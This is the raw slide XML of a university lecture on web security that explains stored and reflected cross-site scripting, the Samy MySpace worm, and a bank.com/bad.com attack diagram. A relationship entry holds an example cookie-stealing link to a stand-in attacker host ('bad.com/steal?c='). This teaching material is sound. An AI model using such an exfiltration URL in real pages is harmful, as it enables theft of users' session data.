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302" r:id="rId3"/>
    <p:sldId id="303" r:id="rId4"/>
    <p:sldId id="304" r:id="rId5"/>
    <p:sldId id="305" r:id="rId6"/>
    <p:sldId id="306" r:id="rId7"/>
    <p:sldId id="308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38" r:id="rId22"/>
    <p:sldId id="339" r:id="rId23"/>
    <p:sldId id="340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24" r:id="rId44"/>
    <p:sldId id="326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08" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="62" d="100"/>
          <a:sy n="62" d="100"/>
        </p:scale>
        <p:origin x="-1524" y="-3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3100000000001E-2"/>
          <c:y val="7.0588999999999999E-2"/>
          <c:w val="0.94377699999999998"/>
          <c:h val="0.749538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Sheet1!$B$2:$B$15</c:f>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$C$1</c:f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0.32</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.72</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.37</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1.01</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1.39</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>3.87</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>19.39</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>16.54</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>11.1</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>6.96</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>4.46</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>2.8</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>3.73</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>3.69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</c:strRef>
          </c:tx>
          <c:spPr>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent3">
                    <a:hueOff val="136526"/>
                    <a:satOff val="23858"/>
                    <a:lumOff val="7773"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent3">
                    <a:hueOff val="-192296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strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$D$2:$D$15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9676672"/>
        <c:axId val="177363136"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="21967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2700000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2286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177363136"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="1"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="17736313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86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219676672"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
        <c:majorUnit val="5"/>
        <c:minorUnit val="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80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7" name="Shape 4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1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7" name="Shape 8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2" name="Shape 6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4" name="Shape 6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8" name="Shape 7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4" name="Shape 7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3767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228850"/>
            <a:ext cx="11099800" cy="6639025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/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384821" indent="-384821">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef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itle Text"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2578099" y="3638550"/>
            <a:ext cx="7848602" cy="2476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03257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39974" y="2890837"/>
            <a:ext cx="8324852" cy="4979269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419805" indent="-419805">
              <a:defRPr sz="3400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="875530" indent="-431030">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:defRPr sz="3200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1284111" indent="-395111">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="2400"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1728611" indent="-395111">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr sz="2400"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2173111" indent="-395111">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buChar char="-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itle Text"/>
          <p:cNvSpPr txBox="1"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7800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r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1500"/>
              </a:spcBef>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:lvl3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ank.co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://bank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ctim.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bad.com/steal?c=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@bc.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:connie@bc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r.uni@bc.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:pearl@bc.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:vidalia@bc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reditcards.cc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ank.co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ank.co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hyperlink" Target="http://ban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spiderman-1.jpg" descr="spiderman-1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2561016" y="637976"/>
            <a:ext cx="7883097" cy="5912322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Web security 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Web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> II</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="With material from Dave Levin, Mike Hicks, Lujo Bauer, Collin Jacks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With material from Dave Levin, Mike Hicks, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Lujo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> Bauer, Collin </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>Jackson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and Michelle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mazurek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tored XSS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Stored XSS Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859" name="Target: User with Javascript-enabled browser who visits user-influenced content on a vulnerable web servi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Target</a:t>
            </a:r>
            <a:r>
              <a:t>: User with </a:t>
            </a:r>
            <a:r>
              <a:rPr i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rPr>
              <a:t>Javascript-enabled browser</a:t>
            </a:r>
            <a:r>
              <a:t> who visits </a:t>
            </a:r>
            <a:r>
              <a:rPr i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rPr>
              <a:t>user-influenced content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on a vulnerable web service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 goal</a:t>
            </a:r>
            <a:r>
              <a:t>: Run script in user’s browser with same access as provided to server’s regular scripts (i.e., subvert SOP)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Attacker needs</a:t>
            </a:r>
            <a:r>
              <a:t>: Ability to leave content on the web server (forums, comments, custom profiles) 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Optional: a server for receiving stolen user information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Key trick</a:t>
            </a:r>
            <a:r>
              <a:t>: Server fails to ensure uploaded content does not contain embedded scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860" name="Where have we heard this before?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5247576" y="8859866"/>
            <a:ext cx="75330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Where have we heard this before?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" grpId="1" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="860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Your friend and mine, Sam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7040"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Your friend and mine, Samy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="863" name="Samy embedded Javascript in his MySpace page (2005)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322199" cy="6286500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3800"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>Samy embedded Javascript in his MySpace page (2005)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MySpace servers attempted to filter it, but failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="408940" indent="-408940" defTabSz="537463">
              <a:spcBef>
                <a:spcPts val="3800"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>Users who visited his page ran the program, which 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Made them friends with Samy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Displayed “but most of all, Samy is my hero” on profile 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Installed script in their profile to propagate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="408940" indent="-408940" defTabSz="537463">
              <a:spcBef>
                <a:spcPts val="3800"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>From 73 to 1,000,000 friends in 20 hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="817880" lvl="1" indent="-408940" defTabSz="537463">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="3312"/>
            </a:pPr>
            <a:r>
              <a:t>Took down MySpace for a weekend</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8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4534" y="6644101"/>
            <a:ext cx="2857501" cy="2857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5" name="Felony computer hacking; banned from computers for 3 years"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845875" y="8995425"/>
            <a:ext cx="92473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5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Felony computer hacking; banned from computers for 3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" grpId="1" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="865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wo types of X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types of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="Stored (or “persistent”) XSS attac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8800" indent="-558800" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="3168">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Stored (or “persistent”) XSS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="651933" lvl="1" indent="-260773" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="2112">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Attacker leaves their script on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server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="651933" lvl="1" indent="-260773" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="2112">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>The server later unwittingly sends it to your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="651933" lvl="1" indent="-260773" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="2112">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Your browser, none the wiser, executes it within the same origin as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server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="558800" indent="-558800" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="3168">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Reflected XSS attack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Attacker gets you to send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a URL that includes Javascript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echoes</a:t>
            </a:r>
            <a:r>
              <a:t> the script back to you in its response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Your browser executes the script in the response within the same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>bank.com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Reflected XSS att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Reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="875" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3227317" y="3481515"/>
            <a:ext cx="1365917" cy="2951633"/>
            <a:chOff x="287035" y="-773022"/>
            <a:chExt cx="1365915" cy="2951631"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="873" name="Browser"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="287035" y="-220410"/>
              <a:ext cx="1365916" cy="2399019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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="874" name="Client"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="373702" y="-773023"/>
              <a:ext cx="119258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Client</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="876" name="bank.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8439852" y="6855362"/>
            <a:ext cx="1632104" cy="142875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  <a:hlinkClick r:id="rId4"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="877" name="bad.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8439852" y="2788188"/>
            <a:ext cx="1632104" cy="142875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bad.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="884" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4571108" y="5306994"/>
            <a:ext cx="3870545" cy="1699347"/>
            <a:chOff x="-44563" y="31968"/>
            <a:chExt cx="3870543" cy="1699346"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="878" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-44564" y="221757"/>
              <a:ext cx="3870545" cy="150955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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="883" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="21528294">
              <a:off x="678166" y="51122"/>
              <a:ext cx="1847993" cy="1080394"/>
              <a:chOff x="6966" y="19178"/>
              <a:chExt cx="1847991" cy="1080392"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="879" name="Click on link"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1304020">
                <a:off x="378277" y="462176"/>
                <a:ext cx="1457961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defRPr sz="2000"/>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>Click on link</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="882" name="Group"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6966" y="19178"/>
                <a:ext cx="458568" cy="529556"/>
                <a:chOff x="6966" y="19178"/>
                <a:chExt cx="458566" cy="529555"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="880" name="Circle"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="59696" y="107401"/>
                  <a:ext cx="353109" cy="353109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81" name="3"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="78566" y="61705"/>
                  <a:ext cx="315369" cy="444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spAutoFit/>
                </a:bodyPr>
                <a:lstStyle>
                  <a:lvl1pPr>
                    <a:defRPr sz="2400">
                      <a:solidFill>
                        <a:srgbClr val="1333FF"/>
                      </a:solidFill>
                    </a:defRPr>
                  </a:lvl1pPr>
                </a:lstStyle>
                <a:p>
                  <a:r>
                    <a:t>3</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="890" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4576396" y="5787212"/>
            <a:ext cx="3881100" cy="1769763"/>
            <a:chOff x="-96692" y="-5996"/>
            <a:chExt cx="3881099" cy="1769762"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="885" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-96693" y="245591"/>
              <a:ext cx="3881101" cy="151817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86" name="Echo user input"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1290205">
              <a:off x="665815" y="540899"/>
              <a:ext cx="20081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 b="1">
                  <a:solidFill>
                    <a:srgbClr val="06BC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Echo user input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="889" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="314865" y="-5997"/>
              <a:ext cx="458567" cy="529557"/>
              <a:chOff x="6966" y="19178"/>
              <a:chExt cx="458566" cy="529555"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="887" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="59696" y="107401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88" name="4"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="78566" y="61705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895" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2366843" y="6228236"/>
            <a:ext cx="1980439" cy="2074689"/>
            <a:chOff x="0" y="20637"/>
            <a:chExt cx="1980438" cy="2074688"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="891" name="Execute the malicious script as though the…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="495125"/>
              <a:ext cx="1980439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2000"/>
              </a:pPr>
              <a:r>
                <a:t>Execute the</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>malicious script</a:t>
              </a:r>
              <a:br/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as though the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server meant us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to run it</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="894" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="22781" y="20637"/>
              <a:ext cx="353109" cy="444501"/>
              <a:chOff x="0" y="20637"/>
              <a:chExt cx="353108" cy="444500"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="892" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="66333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3" name="5"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="38365" y="20637"/>
                <a:ext cx="276378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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="901" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4587972" y="3812304"/>
            <a:ext cx="3883643" cy="1279806"/>
            <a:chOff x="-47656" y="67668"/>
            <a:chExt cx="3883642" cy="1279804"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="896" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-47657" y="147114"/>
              <a:ext cx="3883643" cy="120035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97" name="Steal valuable data"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="627870" y="386130"/>
              <a:ext cx="226288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Steal valuable data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="900" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="242127" y="691311"/>
              <a:ext cx="477570" cy="537511"/>
              <a:chOff x="8994" y="18574"/>
              <a:chExt cx="477568" cy="537510"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="898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9" name="6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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="907" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="2299948">
            <a:off x="4157436" y="6443023"/>
            <a:ext cx="4326783" cy="1468437"/>
            <a:chOff x="-490796" y="15987"/>
            <a:chExt cx="4326782" cy="1468435"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="902" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-490797" y="197462"/>
              <a:ext cx="4326783" cy="128696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903" name="Perform attacker action"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="415971" y="402997"/>
              <a:ext cx="273786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Perform attacker action</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="906" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="40336" y="776725"/>
              <a:ext cx="477569" cy="537511"/>
              <a:chOff x="8994" y="18574"/>
              <a:chExt cx="477568" cy="537510"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="904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05" name="6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6</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="913" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4588180" y="2895398"/>
            <a:ext cx="3850935" cy="1184024"/>
            <a:chOff x="82467" y="-28229"/>
            <a:chExt cx="3850933" cy="1184023"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="908" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="82467" y="-28230"/>
              <a:ext cx="3850935" cy="11840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909" name="Visit web site"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="642696" y="339564"/>
              <a:ext cx="1566165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rgbClr val="010000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Visit web site</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="912" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="239152" y="515346"/>
              <a:ext cx="441263" cy="517536"/>
              <a:chOff x="1450" y="19726"/>
              <a:chExt cx="441262" cy="517534"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="910" name="1"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="64397" y="56244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911" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="45527" y="101940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19" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4581466" y="3161755"/>
            <a:ext cx="3870152" cy="1424378"/>
            <a:chOff x="-44960" y="81569"/>
            <a:chExt cx="3870150" cy="1424376"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="914" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-44961" y="309297"/>
              <a:ext cx="3870152" cy="119664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915" name="Receive malicious page"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="560400" y="479465"/>
              <a:ext cx="2813305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rgbClr val="010000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Receive malicious page</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="918" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="195654" y="863962"/>
              <a:ext cx="441264" cy="517536"/>
              <a:chOff x="1450" y="19726"/>
              <a:chExt cx="441262" cy="517534"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="916" name="2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="64397" y="56244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917" name="Circle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="45527" y="101940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922" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6883313" y="4860712"/>
            <a:ext cx="4976707" cy="1265848"/>
            <a:chOff x="0" y="-111124"/>
            <a:chExt cx="4976705" cy="1265847"/>
          </a:xfrm>
